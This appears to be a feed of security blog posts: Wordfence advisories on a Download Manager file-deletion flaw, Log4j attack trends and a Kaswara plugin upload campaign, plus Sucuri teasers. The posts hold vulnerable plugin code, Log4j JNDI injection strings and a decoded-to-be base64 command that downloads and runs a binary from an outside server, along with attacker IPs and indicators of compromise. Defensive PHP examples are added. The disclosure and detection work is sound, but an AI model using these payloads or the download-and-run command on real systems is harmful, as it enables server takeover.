High Severity Vulnerability Patched in Download Manager Plugin

On July 8, 2022 the Wordfence Threat Intelligence team initiated the responsible disclosure process for a vulnerability we discovered in “Download Manager,” a WordPress plugin that is installed on over 100,000 sites. This flaw makes it possible for an authenticated attacker to delete arbitrary files hosted on the server, provided they have access to create downloads. If an attacker deletes the wp-config.php file they can gain administrative privileges, including the ability to execute code, by re-running the WordPress install process.

Wordfence Premium, Wordfence Care, and Wordfence Response received a firewall rule on July 8, 2022 to provide protection against any attackers that try to exploit this vulnerability. Wordfence Free users will receive this same protection 30 days later on August 7, 2022.

We attempted to reach out to the developer on July 8, 2022, the same day we discovered the vulnerability. We never received a response so we sent the full details to the WordPress.org plugins team on July 26, 2022. The plugin was fully patched the next day on July 27, 2022.

We strongly recommend ensuring that your site has been updated to the latest patched version of “Download Manager”, which is version 3.2.53 at the time of this publication.

Description: Authenticated (Contributor+) Arbitrary File Deletion
Affected Plugin: Download Manager
Plugin Slug: download-manager
Plugin Developer: W3 Eden, Inc.
Affected Versions: <= 3.2.50
CVE ID: CVE-2022-2431
CVSS Score: 8.8 (High)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Researcher/s: Chloe Chamberland
Fully Patched Version: 3.2.51

Download Manager is a popular WordPress plugin designed to allow site content creators to share downloadable files that are stored as posts. These downloads can be displayed on the front-end of the WordPress site for users to download. Unfortunately, vulnerable versions of the plugin contain a flaw in how the path to the downloadable file is stored, and subsequently deleted upon post deletion, that makes it possible for attackers to delete arbitrary files on the server.

More specifically, vulnerable versions of the plugin register the deleteFiles() function on the before_delete_post hook. This hook fires right before a post is deleted, and its intended purpose in this case is to delete any files that were uploaded and associated with a “download” post.

At first glance this looks like relatively safe functionality, assuming the originally supplied file path is validated. Unfortunately, that is not the case: the path to the file saved with the “download” post is not validated to ensure it has a safe file type or resides in a location associated with a “download” post. This means that a path to an arbitrary file with any extension can be supplied via the file[files][] parameter when saving a post, and that file becomes the one associated with the “download” post. On many configurations an attacker could supply a path such as /var/www/html/wp-config.php, associating the site’s WordPress configuration file with the download post.

    // Hook registration elsewhere in the plugin: deleteFiles() runs for every post right before it is removed.
    add_action('before_delete_post', array($this, 'deleteFiles'), 10, 2);

    function deleteFiles($post_id, $post)
    {
        // The stored paths come straight from the file[files][] values saved with the post.
        $files = WPDM()->package->getFiles($post_id, false);
        foreach ($files as $file) {
            $file = WPDM()->fileSystem->locateFile($file);
            // No check that $file is a download-manager file or lives inside the downloads directory;
            // the @ also suppresses any error unlink() would raise.
            @unlink($file);
        }
    }

When the user goes to permanently delete the “download” post the deleteFiles() function will be triggered by the before_delete_post hook and the supplied file will be deleted, if it exists.
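As an added example (not Download Manager’s or Wordfence’s code), here is how the deletion step could be confined to the plugin’s own download directory before unlink() runs. The download directory name, the helper names and the WordPress wiring at the end are assumptions; the demonstration files are constructed in a temporary directory so the script runs without WordPress.

```php
<?php
// Added example, not Download Manager's own code. Every stored path is resolved
// with realpath() and must land strictly inside the configured download
// directory; anything else (../ traversal, an absolute path such as
// wp-config.php, a symlink pointing outside) is logged and skipped, not unlinked.

/**
 * Return the canonical path of $candidate only if it is a regular file inside
 * $baseDir; otherwise return null. Both sides are canonicalised so that
 * traversal segments and symlinks cannot escape the prefix check.
 */
function wpdm_example_confined_path(string $baseDir, string $candidate): ?string
{
    $base = realpath($baseDir);
    $real = realpath($candidate);            // false when the file does not exist
    if ($base === false || $real === false) {
        return null;
    }
    $base = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($real, $base, strlen($base)) !== 0) {
        return null;                          // resolved outside the download tree
    }
    return is_file($real) ? $real : null;
}

/**
 * Hardened counterpart of deleteFiles(): unlink only confined paths and report
 * what was actually removed, without @-suppression hiding failures.
 */
function wpdm_example_delete_files(array $files, string $baseDir): array
{
    $deleted = [];
    foreach ($files as $file) {
        $path = wpdm_example_confined_path($baseDir, $file);
        if ($path === null) {
            error_log("download-manager: skipping path outside the download directory: $file");
            continue;
        }
        if (unlink($path)) {
            $deleted[] = $path;
        }
    }
    return $deleted;
}

// Stand-alone demonstration on a constructed temp tree (no WordPress needed).
$tmp = sys_get_temp_dir() . '/wpdm_example_' . bin2hex(random_bytes(4));
mkdir("$tmp/downloads", 0700, true);
file_put_contents("$tmp/downloads/report.pdf", 'legitimate download');
file_put_contents("$tmp/wp-config.php", '<?php // stand-in for the real config file');

$stored = [                                   // what could have been saved via file[files][]
    "$tmp/downloads/report.pdf",              // legitimate, inside the tree
    "$tmp/downloads/../wp-config.php",        // traversal, rejected
    "$tmp/wp-config.php",                     // absolute path outside the tree, rejected
];
$deleted = wpdm_example_delete_files($stored, "$tmp/downloads");
if (count($deleted) !== 1 || !file_exists("$tmp/wp-config.php")) {
    fwrite(STDERR, "confinement check failed\n");
    exit(1);
}
echo 'deleted: ' . implode(', ', $deleted) . PHP_EOL;
unlink("$tmp/wp-config.php"); rmdir("$tmp/downloads"); rmdir($tmp);

// Inside WordPress the hook would be wired like this; the directory name is an
// assumption, and the guard lets this file run outside WordPress as well.
if (function_exists('add_action')) {
    add_action('before_delete_post', function ($post_id, $post) {
        $dir = wp_upload_dir()['basedir'] . '/download-manager-files';   // assumed location
        wpdm_example_delete_files(WPDM()->package->getFiles($post_id, false), $dir);
    }, 10, 2);
}
```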

This can be used by attackers to delete critical files hosted on the server. The wp-config.php file in particular is a popular target, as deleting it disconnects the existing database from the compromised site and allows the attacker to re-run the initial installation process and connect their own database to the site. Once a database is connected, they would have access to the server and could upload arbitrary files to further infect the system.

Demonstrating site reset upon download post deletion.

This vulnerability requires contributor-level access or above to exploit, so it serves as an important reminder not to grant contributor-level or higher access to untrusted users. It is also important to verify that all users have strong passwords, so that a weak or compromised password does not let an unauthorized actor gain the access needed to exploit a vulnerability like this one.

Timeline

  • July 8, 2022 – Discovery of the Arbitrary File Deletion Vulnerability in the “Download Manager” plugin. A firewall rule is released to Wordfence Premium, Wordfence Care, and Wordfence Response users. We attempt to initiate contact with the developer.
  • July 26, 2022 – After no response from the developer, we send the full disclosure details to the WordPress plugins team. They acknowledge the report and make contact with the developer.
  • July 27, 2022 – A fully patched version of the plugin is released as version 3.2.51.
  • August 7, 2022 – Wordfence free users receive the firewall rule.

Conclusion

In today’s post, we detailed a flaw in the “Download Manager” plugin that makes it possible for authenticated attackers to delete arbitrary files hosted on an affected server, which could lead to remote code execution and ultimately complete site compromise. This flaw has been fully patched in version 3.2.51.

We recommend that WordPress site owners immediately verify that their site has been updated to the latest patched version available, which is version 3.2.53 at the time of this publication.

Wordfence Premium, Wordfence Care, and Wordfence Response received a firewall rule on July 8, 2022 to provide protection against any attackers trying to exploit this vulnerability. Wordfence Free users will receive this same protection 30 days later on August 7, 2022.

If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.

The post High Severity Vulnerability Patched in Download Manager Plugin appeared first on Wordfence.

7 Tips to Clean & Maintain Your Website

Most people would agree — living in a house full of accumulated debris and unnecessary objects can create a chaotic environment, and even cause health problems. This scenario is easily applicable to your website, too. You can think of your hosting environment as the home where your website lives.  

It’s extremely easy for hosting accounts to get cluttered with plugins, themes, test scripts, and unused files. Unfortunately, this can not only slow down your website’s performance but also leave it open to infection.  

Continue reading 7 Tips to Clean & Maintain Your Website at Sucuri Blog.

Analyzing Attack Data and Trends Targeting Log4J

The Log4j vulnerability, initially reported in November 2021, has affected millions of devices and applications around the world, and it has the potential to allow a malicious actor to take full control of vulnerable devices. Because of the way Log4j interprets special lookup strings in the data it logs, the vulnerability allows malicious actors to inject malicious code through log messages and trick applications into running it. When exploited, Log4j inflicts profound damage on affected systems and networks and hands the attacker full control of the affected system. This, combined with the ease with which the vulnerability can be exploited, resulted in the associated CVE, CVE-2021-44228, receiving the unusually high CVSS score of 10, the maximum score that can be given.

Log4j is a widely used logging utility that is part of the Apache Logging Services project. The utility is Java-based and was initially released in 2001. Log4j builds a log of application or system activity, helping developers identify any issues that may negatively impact the end-user experience. While Log4j may not have been a well-known name prior to December 2021, it quickly became a highly discussed topic after the zero-day vulnerability, tracked as CVE-2021-44228, was reported to Apache in November and patched on December 6, 2021. Five days prior to the release of the patch, malicious actors began exploiting the vulnerability.

Wordfence is installed on over 4 million websites worldwide, which gives us unparalleled visibility into attacker payloads as well as large-scale attack patterns. We use this data to power the Wordfence IP blocklist that is available to our Wordfence Premium, Wordfence Care and Wordfence Response customers. It also provides us with valuable forensic data that our incident response team can use when performing forensic analysis for our Wordfence Care and Wordfence Response customers.

At Wordfence we monitor and block attacks targeting Log4j because the threat intelligence this provides helps us identify threat actors that are targeting not only our customers but their hosting providers and enterprise systems around the world. The threat intelligence we get from monitoring these attacks is a valuable source of data for our enterprise customers when determining who they should be blocking at their network edge, which C2 communication they should be monitoring, and which servers globally are being used as an attack platform and need to be remediated.

Anatomy of a Log4j Vulnerability Attack

All it really takes to pull off this attack is entering a string like ${jndi:ldap://malicious-site.com:1792/payload} into a form field, such as the username field on a login page, or injecting it into a request sent to a vulnerable server. With the proper payload, this can open a reverse shell that gives the malicious actor the ability to execute commands and run code on the impacted server.

When the server receives the request, the malicious string is written to the log, and the vulnerability allows it to be evaluated as code. In one simple exploit attempt we detected, the payload references the location cakgeqplp7krte800010wgfiJxzyhzpss.oast[.]fun/info. This type of payload is often used to open a reverse shell, although any number of malicious activities can be carried out with this method.

simple Log4j attack request

In this case, the user agent identifies the request as coming from a Google Chrome browser on Windows XP. Spoofing User-Agents is a tactic used by malicious actors and security researchers alike, so this can be a clue but should be taken with a grain of salt.

User-Agent string

We often see more complex versions of this exploit as well. Payloads are often hidden using base64 encoding at several points in the request, a common method malicious actors use to bypass security measures and make their code unreadable to analysts and to protection mechanisms. The jndi:ldap: portion of the payload can also be hidden inside dummy functions. Multiple obfuscation techniques are layered in these attacks, both to make the code harder for analysts to read and to evade automatic detection. Here we see the ${jndi:ldap: portion of the string split into pieces, presumably to defeat detection rules that match on the contiguous string.

Log4j request obfuscation

The Referer, User-Agent, and X-API-Version headers of this request each carry the full payload, including ${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}, which resolves to jndi:ldap: when the logged request is processed.

complex Log4j request with obfuscated payloads

Malicious actors do not know which fields will be logged on a given system, so they frequently submit the exploit in multiple places to see what works. In the request above, the Referer, User-Agent, and X-API-Version headers all carry the same malicious string. The final payload here is fetched from //146.190.40.2:1389/TomcatBypass/Command/Base64/Y3VybCBodHRwOi8vMTg1LjEwMS4xMzkuMjE2OjE5NjQvYTAwMS54ODYgLW8gYTAwMS54ODY7IHdnZXQgaHR0cDovLzE4NS4xMDEuMTM5LjIxNjoxOTY0L2EwMDEueDg2OyBjaG1vZCA3NzcgYTAwMS54ODY7IC4vYTAwMS54ODY7IHJtIC1yZiBhMDAxLng4Njsgcm0gLXJmIGEwMDEueDg2LjE=, which decodes to the intended command and runs it on the affected server.

This command uses both curl and wget to download the payload, sets the most permissive file mode on it, runs the downloaded file, then removes both copies once it has run. Using multiple download methods increases the chance of a successful download.
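As an added example (not Wordfence’s code), this normaliser resolves the ${env:NAME:-x} lookups shown above to their fallback text before matching, so the split payload is detected as jndi:ldap:. It also handles the ${lower:}, ${upper:} and ${::-x} lookups that are used for the same purpose but do not appear in the post; the request headers are constructed and the IP address is a documentation address, not one from the observed attacks.

```php
<?php
// Added example, not Wordfence code. On a target where the looked-up variable
// (BARFOO here) is unset, Log4j substitutes the text after ":-", so the detector
// rewrites every such lookup to its fallback text before matching. The request
// headers below are constructed; 203.0.113.5 is an RFC 5737 documentation address.

/**
 * Repeatedly collapse Log4j lookup syntax until the string stops changing:
 *   ${env:BARFOO:-j} -> j    ${::-j} -> j    ${lower:J} -> j    ${upper:j} -> J
 * Only lookups with no braces inside match, so innermost ones resolve first and
 * nested constructions unwind over successive passes.
 */
function log4j_normalize(string $s): string
{
    $rules = [
        '/\$\{[^{}]*?:-([^{}]*)\}/' => fn(array $m): string => $m[1],
        '/\$\{lower:([^{}]*)\}/i'   => fn(array $m): string => strtolower($m[1]),
        '/\$\{upper:([^{}]*)\}/i'   => fn(array $m): string => strtoupper($m[1]),
    ];
    do {
        $before = $s;
        foreach ($rules as $re => $fn) {
            $s = preg_replace_callback($re, $fn, $s);
        }
    } while ($s !== $before);
    return $s;
}

/**
 * Return the matched JNDI indicator from a header value, or null. Matching runs
 * on the normalised, lower-cased text so split or re-cased variants are caught.
 */
function log4j_indicator(string $value): ?string
{
    $norm = strtolower(log4j_normalize($value));
    if (preg_match('/jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nis|nds|http)\s*:/', $norm, $m)) {
        return $m[0];
    }
    return null;
}

/** Scan every header of a request; returns [header name => indicator] for hits. */
function log4j_scan_headers(array $headers): array
{
    $hits = [];
    foreach ($headers as $name => $value) {
        $hit = log4j_indicator($value);
        if ($hit !== null) {
            $hits[$name] = $hit;
        }
    }
    return $hits;
}

// Constructed request mirroring the pattern described above: the same obfuscated
// payload placed in several headers in case any one of them ends up in a log.
$split = '${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//203.0.113.5:1389/a}';
$request = [
    'User-Agent'    => $split,
    'Referer'       => $split,
    'X-Api-Version' => '${${lower:${::-J}}${upper:n}di:${lower:LDAP}://203.0.113.5:1389/a}',
    'Accept'        => 'text/html,application/xhtml+xml',
];
print_r(log4j_scan_headers($request));   // the three payload-bearing headers are reported, Accept is not
```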

Final payloads do appear to be taken down quickly. We tried to obtain a final payload from several locations, and were unable to successfully connect to the payload location. This goes to show both the dedication of the cybersecurity community in combating potential attacks, as well as how fast malicious actors move on and set up new resources as needed.

Log4j Exploit Attempt Volume Over Time

Wordfence has observed some interesting trends since we began tracking and blocking Log4j exploit attempts several months ago. The number of exploit attempts has been relatively consistent since the start of our tracking, attempts are coming from unexpected places, and some regions appear to be bigger targets. In short, our data indicates that malicious actors are not moving on from this vulnerability.

total volume of incoming Log4j attack attempts

Where Are the Attempted Attacks Coming From?

Reviewing the top 100 source locations of exploit attempts seen in the past 30 days shows that only a few IP addresses are responsible for very large numbers of attempts. There were 11,060,156 blocked attempts in this time frame, from a total of 38,258 IP addresses logged as originators of exploit attempts.

number of exploits blocked per IP address

The server locations for the top 15 IP addresses detected include countries such as the United States, Switzerland, the United Kingdom, France, and Belgium. Traffic from many of the other countries may have legitimate reasons for accessing your services as well, which makes regional blocking difficult for many organizations.

server providers for top 15 attacking IP addresses

The attack attempts largely originate from IP addresses owned by legitimate providers. This is something we commonly see during attack campaigns, as attackers typically look for the cheapest or most reliable way to deliver their attacks. It is unlikely you would want to block all IP addresses assigned to Amazon or Microsoft, and doing so is not recommended. Fortunately, most of these providers will quickly remove access for users found to be performing malicious activities.

server locations of top 15 attacker IP addresses

Malicious actors will often use one IP or service for a short time, then quickly move to a new IP address, server, or service provider. This could either be to avoid detection, or to recover once they have been detected. For this reason, we have a blocklist that is regularly updated with known malicious IP addresses. When an IP address is no longer being used for malicious purposes, we remove the address from the list so that legitimate websites and services are not blocked. This allows malicious actors to be blocked, while legitimate site users and services can be allowed the needed access to your website.

Many organizations are taking this vulnerability seriously and having their servers checked for it. We saw a total of 1,296,940 benign vulnerability scanning attempts from security vendors; these have been excluded from the data above.

Conclusion

In this post, we covered the critical Log4j vulnerability tracked as CVE-2021-44228 and the visibility Wordfence has as an endpoint security provider. Wordfence uses this data to ensure that our users are protected from emerging and lingering threats ranging from vulnerabilities to malware. This same data can also be used to provide additional protection against attacks against your networks and other systems.

Threat intelligence is an important part of keeping your systems, applications, and networks safe. A view of the trends and details of attack campaigns can show you what threats are likely to affect your organization, giving you the opportunity to mitigate attacks.

If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both of these products include hands-on support in case you need further assistance.

WordPress Vulnerabilities & Patch Roundup — July 2022

Vulnerability reports and responsible disclosures are essential for website security awareness and education. Automated attacks targeting known software vulnerabilities are one of the leading causes of website compromises.

To help educate website owners on emerging threats to their environments, we’ve compiled a list of important security updates and vulnerability patches for the WordPress ecosystem this past month.

Youzify – Unauthenticated SQLi
Security Risk: Critical
Vulnerability: SQL Injection
Exploitation Level: Can be exploited remotely without authentication.

Continue reading WordPress Vulnerabilities & Patch Roundup — July 2022 at Sucuri Blog.

PSA: Sudden Increase In Attacks On Modern WPBakery Page Builder Addons Vulnerability

The Wordfence Threat Intelligence team has been monitoring a sudden increase in attack attempts targeting Kaswara Modern WPBakery Page Builder Addons. This ongoing campaign is attempting to take advantage of an arbitrary file upload vulnerability, tracked as CVE-2021-24284, which was previously disclosed and has not been patched; the plugin has since been closed. Because the plugin was closed without a patch, all versions of the plugin are affected by this vulnerability. The vulnerability can be used to upload malicious PHP files to an affected website, leading to code execution and complete site takeover. Once they have established a foothold, attackers can also inject malicious JavaScript into files on the site, among other malicious actions.

All Wordfence customers have been protected from this attack campaign by the Wordfence Firewall since May 21, 2021, with Wordfence Premium, Care, and Response customers having received the firewall rule 30 days earlier on April 21, 2021. Even though Wordfence provides protection against this vulnerability, we strongly recommend completely removing Kaswara Modern WPBakery Page Builder Addons as soon as possible and finding an alternative as it is unlikely the plugin will ever receive a patch for this critical vulnerability. We are currently protecting over 1,000 websites that still have the plugin installed, and we estimate that between 4,000 and 8,000 websites in total still have the plugin installed.

We have blocked an average of 443,868 attack attempts per day against the network of sites that we protect during the course of this campaign. Please be aware that while 1,599,852 unique sites were targeted, a majority of those sites were not running the vulnerable plugin.

total volume of attacks

Description: Arbitrary File Upload/Deletion and Other
Affected Plugin: Kaswara Modern WPBakery Page Builder Addons
Plugin Slug: kaswara
Affected Versions: <= 3.0.1
CVE ID: CVE-2021-24284
CVSS Score: 10.0 (Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Fully Patched Version: NO AVAILABLE PATCH.

Indicators of Attack

The majority of the attacks we have seen are sending a POST request to /wp-admin/admin-ajax.php using the uploadFontIcon AJAX action found in the plugin to upload a file to the impacted website. Your logs may show the following query string on these events:

/wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1

We have observed 10,215 attacking IP addresses, with the vast majority of exploit attempts coming from these top ten IPs:

  • 217.160.48.108 with 1,591,765 exploit attempts blocked
  • 5.9.9.29 with 898,248 exploit attempts blocked
  • 2.58.149.35 with 390,815 exploit attempts blocked
  • 20.94.76.10 with 276,006 exploit attempts blocked
  • 20.206.76.37 with 212,766 exploit attempts blocked
  • 20.219.35.125 with 187,470 exploit attempts blocked
  • 20.223.152.221 with 102,658 exploit attempts blocked
  • 5.39.15.163 with 62,376 exploit attempts blocked
  • 194.87.84.195 with 32,890 exploit attempts blocked
  • 194.87.84.193 with 31,329 exploit attempts blocked

total exploit attempts

Indicators of Compromise

Based on our analysis of the attack data, a majority of attackers are attempting to upload a zip file named a57bze8931.zip. When attackers are successful at uploading the zip file, a single file named a57bze8931.php will be extracted into the /wp-content/uploads/kaswara/icons/ directory. The malicious file has an MD5 hash of d03c3095e33c7fe75acb8cddca230650. This file is an uploader under the control of the attacker. With this file, a malicious actor has the ability to continue uploading files to the compromised website.

The indicators observed in these attacks also include signs of the NDSW trojan, which injects code into otherwise legitimate JavaScript files and redirects site visitors to malicious websites. The presence of this string in your JavaScript files is a strong indication that your site has been infected with NDSW:

;if(ndsw==

Some additional filenames that attackers are attempting to upload include:

  • [xxx]_young.zip where [xxx] varies and typically consists of 3 characters like ‘svv_young’
  • inject.zip
  • king_zip.zip
  • null.zip
  • plugin.zip
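As an added example (not Wordfence’s code), the following checks tally POST requests carrying the uploadFontIcon action per source IP from Apache combined-format access-log lines, and match uploaded filenames against the names listed above. The log lines, IP addresses, timestamps and status codes are constructed sample data, not observed attack records.

```php
<?php
// Added example, not Wordfence code. Parses Apache combined-format lines, counts
// POSTs to admin-ajax.php with action=uploadFontIcon per source IP (noting which
// ones got a 200 back), and flags filenames matching the campaign's upload names.
// All log lines below are constructed; IPs are from RFC 5737 documentation ranges.

/** Parse one combined-format line into ip, time, method, path, status; null if unparsable. */
function kaswara_parse_line(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) /';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3], 'path' => $m[4], 'status' => (int) $m[5]];
}

/** True when the request is a POST to admin-ajax.php whose decoded action is uploadFontIcon. */
function kaswara_is_upload_attempt(array $req): bool
{
    if ($req['method'] !== 'POST') {
        return false;
    }
    $path = (string) parse_url($req['path'], PHP_URL_PATH);
    parse_str((string) parse_url($req['path'], PHP_URL_QUERY), $params);   // parse_str URL-decodes
    return str_ends_with($path, '/wp-admin/admin-ajax.php')
        && isset($params['action'])
        && strcasecmp((string) $params['action'], 'uploadFontIcon') === 0;
}

/** Per-IP tally of upload attempts, plus how many of them returned HTTP 200. */
function kaswara_tally(array $lines): array
{
    $tally = [];
    foreach ($lines as $line) {
        $req = kaswara_parse_line($line);
        if ($req === null || !kaswara_is_upload_attempt($req)) {
            continue;
        }
        $tally[$req['ip']] ??= ['attempts' => 0, 'succeeded' => 0];
        $tally[$req['ip']]['attempts']++;
        if ($req['status'] === 200) {
            $tally[$req['ip']]['succeeded']++;     // a 200 here deserves a look at wp-content/uploads/kaswara/icons/
        }
    }
    return $tally;
}

/** Match an uploaded filename against the names reported for this campaign. */
function kaswara_suspicious_filename(string $name): bool
{
    $fixed = ['a57bze8931.zip', 'inject.zip', 'king_zip.zip', 'null.zip', 'plugin.zip'];
    return in_array(strtolower($name), $fixed, true)
        || preg_match('/^[a-z0-9]{3}_young\.zip$/i', $name) === 1;   // [xxx]_young.zip
}

// Constructed sample log: two attacking hosts, one legitimate admin-ajax call, one GET probe.
$log = [
    '198.51.100.7 - - [10/Jul/2022:02:14:11 +0000] "POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1" 200 61 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Jul/2022:02:14:13 +0000] "POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1" 403 0 "-" "Mozilla/5.0"',
    '203.0.113.21 - - [10/Jul/2022:02:15:40 +0000] "POST /wp-admin/admin-ajax.php?action=upload%46ontIcon HTTP/1.1" 403 0 "-" "curl/7.68.0"',
    '192.0.2.9 - - [10/Jul/2022:02:16:02 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 44 "-" "Mozilla/5.0"',
    '203.0.113.21 - - [10/Jul/2022:02:16:30 +0000] "GET /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1" 400 0 "-" "curl/7.68.0"',
];
print_r(kaswara_tally($log));                 // attempts and successes per attacking IP
var_dump(kaswara_suspicious_filename('svv_young.zip'), kaswara_suspicious_filename('logo.zip'));
```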

What Should I Do If I Use This Plugin?

All Wordfence users, including Free, Premium, Care, and Response, are protected from exploits targeting this vulnerability. However, at this time the plugin has been closed, and the developer has not been responsive regarding a patch. The best option is to fully remove the Kaswara Modern WPBakery Page Builder Addons plugin from your WordPress website.

If you know a friend or colleague who is using this plugin on their site, we highly recommend forwarding this advisory to them to help keep their sites protected, as this is a serious vulnerability that can lead to complete site takeover.

If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both of these products include hands-on support in case you need further assistance.

DHL Phishing Page Uses Telegram Bot for Exfiltration

One of the quickest ways for an attacker to harvest financial data, credentials, and sensitive personal information is through phishing. These social engineering attacks can typically be found masquerading as a trusted or recognizable service, intent on tricking unsuspecting users into submitting sensitive information on the attacker’s customized web page.

Criminals use phishing because it can be easier to exploit a human’s natural inclination to trust rather than look for new ways to exploit a software vulnerability — it’s often easier to trick a user into giving up their password than trying to hack the password using brute force or dictionary attacks, unless of course the target happens to be using really weak credentials.

Continue reading DHL Phishing Page Uses Telegram Bot for Exfiltration at Sucuri Blog.
